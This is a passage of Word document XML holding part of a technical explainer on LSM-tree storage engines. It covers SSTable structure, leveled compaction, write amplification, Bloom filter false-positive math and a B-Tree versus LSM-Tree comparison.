        <w:t xml:space="preserve">  Remove deleted entries, deduplicate, maintain sorted order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923892D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Old SSTables deleted after merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235242E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The SSTable (Sorted String Table) format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCD981" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490F7F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SSTable file structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6884965D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Data blocks:    sorted (key, value) pairs, compressed (Snappy, Zstd, LZ4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189685E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index block:    one entry per data block → (last_key_in_block, block_offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75BE48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Bloom filter:   probabilistic membership test — "is key X definitely NOT in this file?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311ABB7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Metadata:       file-level statistics (key range, entry count, size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F58A56" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Footer:         offsets to index block, bloom filter, metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8CCA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5FDA1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Key lookup in SSTable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F7442" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Check bloom filter → if "definitely not present": skip this file entirely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5BED22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Binary search index block → find which data block might contain key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4ED11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Read data block → linear scan for key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B279C77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA3B4C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Bloom filter eliminates ~99% of unnecessary SSTable reads for absent keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B1CA0B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The leveled structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0F65E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F183D0E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 0: Recent flushes from MemTable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEB11CE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Multiple SSTables, key ranges may overlap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817163A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read: must check ALL Level 0 files (overlapping ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC9BCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Size: typically 4-8 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B183CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="431A2D22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 1: ~10MB total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E424D23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Non-overlapping key ranges (maintained by compaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096251D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read: binary search to find the one file that could contain a key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A8482" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A20D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 2: ~100MB total (10× Level 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA484D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 3: ~1GB total (10× Level 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A458F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 4: ~10GB total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F4B40C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 5: ~100GB total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC076E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Level 6: ~1TB total (largest level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5BCFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3E4FE7F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Each level: 10× larger than previous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82AF19" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           Non-overlapping within the level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228406AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           O(1) file to check per level (except Level 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E012EAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compaction — the write amplification source:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68B183" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>When Level N grows too large, files are compacted into Level N+1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216EC270" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125FFFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Compaction (Level N → Level N+1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA09FE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Select a file from Level N (oldest or most overlap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE0587" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Select overlapping files from Level N+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6E4FD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Merge-sort all selected files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB6254" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Write merged result as new Level N+1 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527EEA2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Delete old files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA9216" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C30DE3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write amplification per level: 10× (one byte written at Level N eventually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8AAA3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  written 10× at Level N+1 through compaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B6FBA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0A6E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Total write amplification: height × 10 = 6 × 10 = 60× for a 6-level structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FF470" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (each byte written once to MemTable → flushed to L0 → compacted through L1...L6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E014494" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B0BE14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This is LSM-Tree's fundamental trade-off: high write amplification in exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478D6B7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>for sequential I/O (much faster than B-Tree's random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD1EEF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bloom filters — the read optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C95451" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A bloom filter is a probabilistic data structure that can answer "is element X definitely not in this set?" with zero false negatives and configurable false positive rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B4987E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4AF74A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Bloom filter internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD795E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  M-bit array, initialized to all 0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782600C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  K hash functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F8FF9A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F729608" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Insert key k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F277A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Set bits at positions h₁(k), h₂(k), ..., h</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₖ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>(k) to 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E49409" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1005B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query key k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB845A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Check bits at positions h₁(k), h₂(k), ..., h</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₖ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>(k)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A53E689" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If any bit is 0: key DEFINITELY not present (no false negatives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC006AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If all bits are 1: key POSSIBLY present (false positives possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD5D97" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C20A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>False positive rate: approximately (1 - e^(-kn/m))^k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC91DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  n = number of inserted keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720488CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  m = number of bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300FF42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  k = number of hash functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D5846" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A405257" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Optimal k = (m/n) × ln(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3B66F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>At 10 bits per key: ~1% false positive rate (1 in 100 bloom filter checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AB091" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  generates a false positive, requiring an actual SSTable read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70748869" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="41A206E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>RocksDB bloom filter: 10 bits/key, ~1% FPR, blocks 99% of unnecessary reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF8EFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LSM vs B-Tree — The Engineering Trade-off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CFC77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387E2D95" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                     B-Tree          LSM-Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA78A7D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write I/O:           Random          Sequential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4578C3B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write amplification: 2-10×           10-60×</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F80E74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read I/O (point):    O(log N)        O(levels) + bloom filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F57F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read I/O (range):    O(log N + K)    O(levels × files_per_level + K)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEED183" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Space amplification: 1.1-1.3×       1.1-2× (during compaction: up to 2×)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE8515A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read consistency:    Immediate       Eventual per read path complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1485BD78" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Compaction:         None            Background CPU + I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C25AEA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6026B74B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Best for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4852B4DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  B-Tree:   Read-heavy, mixed, OLTP, range queries important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0EBA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  LSM-Tree: Write-heavy, time-series, event logging, sequential access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D6B6A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5EA41D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Real workload examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CAC7DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  B-Tree: PostgreSQL, MySQL InnoDB, Oracle — OLTP databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F629FF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  LSM-Tree: Cassandra (time-series, event data), RocksDB (write-heavy embedded DB),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F7410" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
